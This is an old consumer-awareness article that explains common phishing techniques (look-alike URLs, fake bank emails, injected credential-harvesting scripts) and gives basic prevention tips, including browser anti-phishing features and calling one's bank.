Phishing: Basics of Phishing and Preventive Measures

Phishing is a kind of activity through which phishers [an attacker] make attempts to obtain sensitive information such as your credit card details, passwords of your mailbox or bank account by pretending to be from a legitimate source.

Phishing can be both socially and technically engineered. A person pretending to be from a bank and asking for your account information for regular maintenance is an example of socially engineered phishing. Where as, an email which seems to have come from from your bank and asking you to login to your banking account to keep your account active can be called a technically engineered phishing. Such attempts to obtain your personal and confidential information is known as phishing attack.

On an average, there are over 30,000+ phishing attempts worldwide and chances are there that you must have also received one of those emails from Nigeria or somewhere else asking for your help to transfer millions of dollars from their account to yours for various purposes.

Most common phishing techniques

Malformed URL/weblink - Simplest and most common phishing attempt is done through a malformed URL. At first glance the URL may appear to be legitimate but a closer look will reveal that URL actually looks like http://www.your-bank.com.my-website.com [www.your-bank.com is a sub domain to my-website.com]. It’s very easy to create such subdomains yourself. People who are not so technical may not be able to differentiate between a genuine and a malformed URL and thus often become victims of such phishing attempts. Another use of URL transformation is by embedding a link into an email where in the link might appear as [www.your-bank.com] but the actual link could be www.your-bank.com@mydomain.com. When you click on this link, you will be landing on a page which is hosted on mydomain.com and not www.your-bank.com! Take a closer look before you click on such embedded links. [Right click, select 'Copy Link Location' and paste in notepad to check it yourself]

Email from your bank - Another common phishing attempt is to obtain your credit card information, your password of bank account by means of an email. The email may contain a message prompting you to click on a link contained in the email which will take you to a page where you will be required to enter your credit card information, it’s security code, your name to keep your account in operation. After entering the required information, one might see “Thank you” message but then the entered information could have been sent to an undisclosed mailbox from which the phisher/attacker will receive your sensitive information.

Script harvesting - This is a rare incident but quite possible. An attacker gains access to a server hosting a website by compromising its security and places his code in the website’s pages. Now, going forward any user who will login to the system will have his account related information sent to a mailbox without your or domain admin’s knowledge. Such attacks are difficult to detect unless noticed by a user or webmaster.

Preventive Measures

A little knowledge about such phishing attempts [you have it now ;)] and upgrading your browser to latest versions [IE 7 and Firefox 2.0] which have phishing detection [Anti-Phishing] builtin, can prevent you from becoming another victim of phishing attacks. Alternatively, you can download the Anti-Phishing toolbar from Netcraft and install it in your browser. It shows you risk rating of a website when you access it and helps you in detecting phishing attempts.

If you receive an email from your bank which looks suspicious, immediately contact your bank by calling their office number and seek their advise. When you do online shopping, look for a certificate or https:// in your URL bar of the browser [your information must be encrypted before it is transmitted over the web].

Following the simple tips mentioned above to prevent yourself from most common phishing attacks.

More information on Phishing @ [http://en.wikipedia.org/wiki/Phishing]